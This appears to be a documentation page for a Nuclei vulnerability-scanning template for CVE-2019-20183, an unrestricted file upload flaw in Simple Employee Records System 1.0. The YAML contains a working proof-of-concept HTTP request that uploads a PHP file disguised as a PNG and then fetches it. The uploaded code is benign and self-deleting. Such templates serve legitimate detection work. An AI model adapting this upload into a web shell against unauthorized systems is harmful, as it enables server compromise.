Simple Employee Records System 1.0 - Unrestricted File Upload
ID: CVE-2019-20183
Severity: high
Author: pikpikcu,j4vaovo
Tags: cve,cve2019,edb,rce,fileupload,intrusive,employee_records_system_project
Description
Section titled “Description”Simple Employee Records System 1.0 contains an arbitrary file upload vulnerability due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or perform remote command execution.
YAML Source
Section titled “YAML Source”id: CVE-2019-20183
info: name: Simple Employee Records System 1.0 - Unrestricted File Upload author: pikpikcu,j4vaovo severity: high description: | Simple Employee Records System 1.0 contains an arbitrary file upload vulnerability due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or perform remote command execution. impact: | Successful exploitation of this vulnerability can result in unauthorized access to the system, remote code execution, and potential compromise of sensitive data. remediation: | Apply the latest patch or update to Simple Employee Records System 1.0 to fix the unrestricted file upload vulnerability. reference: - https://www.exploit-db.com/exploits/49596 - https://medium.com/@Pablo0xSantiago/cve-2019-20183-employee-records-system-bypass-file-upload-to-rce-ea2653660b34 - https://nvd.nist.gov/vuln/detail/CVE-2019-20183 - https://medium.com/%40Pablo0xSantiago/cve-2019-20183-employee-records-system-bypass-file-upload-to-rce-ea2653660b34 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2019-20183 cwe-id: CWE-434 epss-score: 0.03815 epss-percentile: 0.91874 cpe: cpe:2.3:a:employee_records_system_project:employee_records_system:1.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: employee_records_system_project product: employee_records_system tags: cve,cve2019,edb,rce,fileupload,intrusive,employee_records_system_project
http: - raw: - | POST /dashboard/uploadID.php HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337
-----------------------------5825462663702204104870787337 Content-Disposition: form-data; name="employee_ID"; filename="poc.php" Content-Type: image/png
<?php echo md5('CVE-2019-20183'); unlink(__FILE__); ?> -----------------------------5825462663702204104870787337-- - | GET /uploads/employees_ids/{{endpoint}} HTTP/1.1 Host: {{Hostname}}
matchers: - type: word part: body_2 words: - "1ad0d710225c472cb7396b3c1d97e4dd"
extractors: - type: regex name: endpoint regex: - '(?:[a-zA-Z0-9+\/])*_poc.php' internal: true part: body# digest: 4a0a00473045022000c60e3b4c59af24494f726636d19f36aa8521fbb1dbd9bdea8979cb30a6e959022100dfe8f38497cf225e346349452a4d4e98c1f026602057611bea4aa4a035b8c670:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-20183.yaml"